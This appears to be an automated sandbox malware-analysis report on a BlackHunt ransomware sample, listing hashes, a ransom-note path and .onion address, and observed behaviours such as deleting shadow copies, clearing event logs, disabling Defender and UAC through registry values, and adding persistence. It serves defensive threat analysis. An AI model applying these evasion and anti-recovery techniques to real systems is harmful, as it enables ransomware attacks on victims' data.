Analysis
-
max time kernel
122s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:23
Static task
static1
Behavioral task
behavioral1
Sample
a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe
Resource
win10v2004-20231215-en
General
-
Target
a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe
-
Size
707KB
-
MD5
6ad6daa09ffa68451e59a799f4011139
-
SHA1
411e3d7d36ae8fc470a3db1fafd765250046ff55
-
SHA256
a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571
-
SHA512
222c7e1337a725b1b6ba0461679193957b86ab01bebae8cad38b6d14a0354023aa0804424872d8490c61c0431f3478549e38c17d6069e8bc8741ed64d9d83c3e
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1a8Jvnh:6uaTmkZJ+naie5OTamgEoKxLWBth
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1096 fsutil.exe 2580 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2328 wevtutil.exe 1776 wevtutil.exe 2188 wevtutil.exe 1356 wevtutil.exe 544 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2628 bcdedit.exe 2828 bcdedit.exe 2984 bcdedit.exe 1192 bcdedit.exe -
pid Process 2712 wbadmin.exe 1080 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1468 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe -
Enumerates connected drives 3 TTPs 26 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\W: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\U: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\X: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\L: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\A: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\S: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\I: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\O: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\K: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\P: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\H: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\Z: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\M: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\J: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\N: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\G: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\V: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\R: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\T: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File opened (read-only) \??\Y: a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\Google\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\Google\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\#BlackHunt_ReadMe.hta a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\#BlackHunt_Private.key a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.txt a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1592 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1504 vssadmin.exe 2236 vssadmin.exe 2600 vssadmin.exe 1404 vssadmin.exe 112 vssadmin.exe 1492 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1500 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon vssvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" vssvc.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1224 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2416 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe Token: SeRestorePrivilege 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe Token: SeBackupPrivilege 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe Token: SeTakeOwnershipPrivilege 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe Token: SeAuditPrivilege 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe Token: SeSecurityPrivilege 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe Token: SeIncBasePriorityPrivilege 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe Token: SeBackupPrivilege 2916 vssvc.exe Token: SeRestorePrivilege 2916 vssvc.exe Token: SeAuditPrivilege 2916 vssvc.exe Token: SeBackupPrivilege 2300 wbengine.exe Token: SeRestorePrivilege 2300 wbengine.exe Token: SeSecurityPrivilege 2300 wbengine.exe Token: SeSecurityPrivilege 1356 wevtutil.exe Token: SeBackupPrivilege 1356 wevtutil.exe Token: SeSecurityPrivilege 2188 wevtutil.exe Token: SeBackupPrivilege 2188 wevtutil.exe Token: SeSecurityPrivilege 1776 wevtutil.exe Token: SeBackupPrivilege 1776 wevtutil.exe Token: SeSecurityPrivilege 544 wevtutil.exe Token: SeBackupPrivilege 544 wevtutil.exe Token: SeSecurityPrivilege 2328 wevtutil.exe Token: SeBackupPrivilege 2328 wevtutil.exe Token: SeDebugPrivilege 1500 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1640 wrote to memory of 2236 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 112 PID 1640 wrote to memory of 2236 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 112 PID 1640 wrote to memory of 2236 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 112 PID 1640 wrote to memory of 2236 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 112 PID 1640 wrote to memory of 2504 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 111 PID 1640 wrote to memory of 2504 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 111 PID 1640 wrote to memory of 2504 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 111 PID 1640 wrote to memory of 2504 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 111 PID 1640 wrote to memory of 2308 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 110 PID 1640 wrote to memory of 2308 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 110 PID 1640 wrote to memory of 2308 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 110 PID 1640 wrote to memory of 2308 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 110 PID 2236 wrote to memory of 2016 2236 cmd.exe 107 PID 2236 wrote to memory of 2016 2236 cmd.exe 107 PID 2236 wrote to memory of 2016 2236 cmd.exe 107 PID 1640 wrote to memory of 2460 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 30 PID 1640 wrote to memory of 2460 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 30 PID 1640 wrote to memory of 2460 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 30 PID 1640 wrote to memory of 2460 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 30 PID 1640 wrote to memory of 2708 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 32 PID 1640 wrote to memory of 2708 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 32 PID 1640 wrote to memory of 2708 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 32 PID 1640 wrote to memory of 2708 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 32 PID 1640 wrote to memory of 2848 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 105 PID 1640 wrote to memory of 2848 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 105 PID 1640 wrote to memory of 2848 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 105 PID 1640 wrote to memory of 2848 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 105 PID 2308 wrote to memory of 3064 2308 cmd.exe 103 PID 2308 wrote to memory of 3064 2308 cmd.exe 103 PID 2308 wrote to memory of 3064 2308 cmd.exe 103 PID 1640 wrote to memory of 2732 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 33 PID 1640 wrote to memory of 2732 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 33 PID 1640 wrote to memory of 2732 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 33 PID 1640 wrote to memory of 2732 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 33 PID 1640 wrote to memory of 2704 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 102 PID 1640 wrote to memory of 2704 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 102 PID 1640 wrote to memory of 2704 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 102 PID 1640 wrote to memory of 2704 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 102 PID 1640 wrote to memory of 3048 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 100 PID 1640 wrote to memory of 3048 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 100 PID 1640 wrote to memory of 3048 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 100 PID 1640 wrote to memory of 3048 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 100 PID 1640 wrote to memory of 2856 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 98 PID 1640 wrote to memory of 2856 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 98 PID 1640 wrote to memory of 2856 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 98 PID 1640 wrote to memory of 2856 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 98 PID 1640 wrote to memory of 2900 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 97 PID 1640 wrote to memory of 2900 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 97 PID 1640 wrote to memory of 2900 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 97 PID 1640 wrote to memory of 2900 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 97 PID 2460 wrote to memory of 2916 2460 cmd.exe 96 PID 2460 wrote to memory of 2916 2460 cmd.exe 96 PID 2460 wrote to memory of 2916 2460 cmd.exe 96 PID 2504 wrote to memory of 3000 2504 cmd.exe 95 PID 2504 wrote to memory of 3000 2504 cmd.exe 95 PID 2504 wrote to memory of 3000 2504 cmd.exe 95 PID 1640 wrote to memory of 2300 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 94 PID 1640 wrote to memory of 2300 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 94 PID 1640 wrote to memory of 2300 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 94 PID 1640 wrote to memory of 2300 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 94 PID 1640 wrote to memory of 2864 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 92 PID 1640 wrote to memory of 2864 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 92 PID 1640 wrote to memory of 2864 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 92 PID 1640 wrote to memory of 2864 1640 a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe 92 -
System policy modification 1 TTPs 3 IoCs
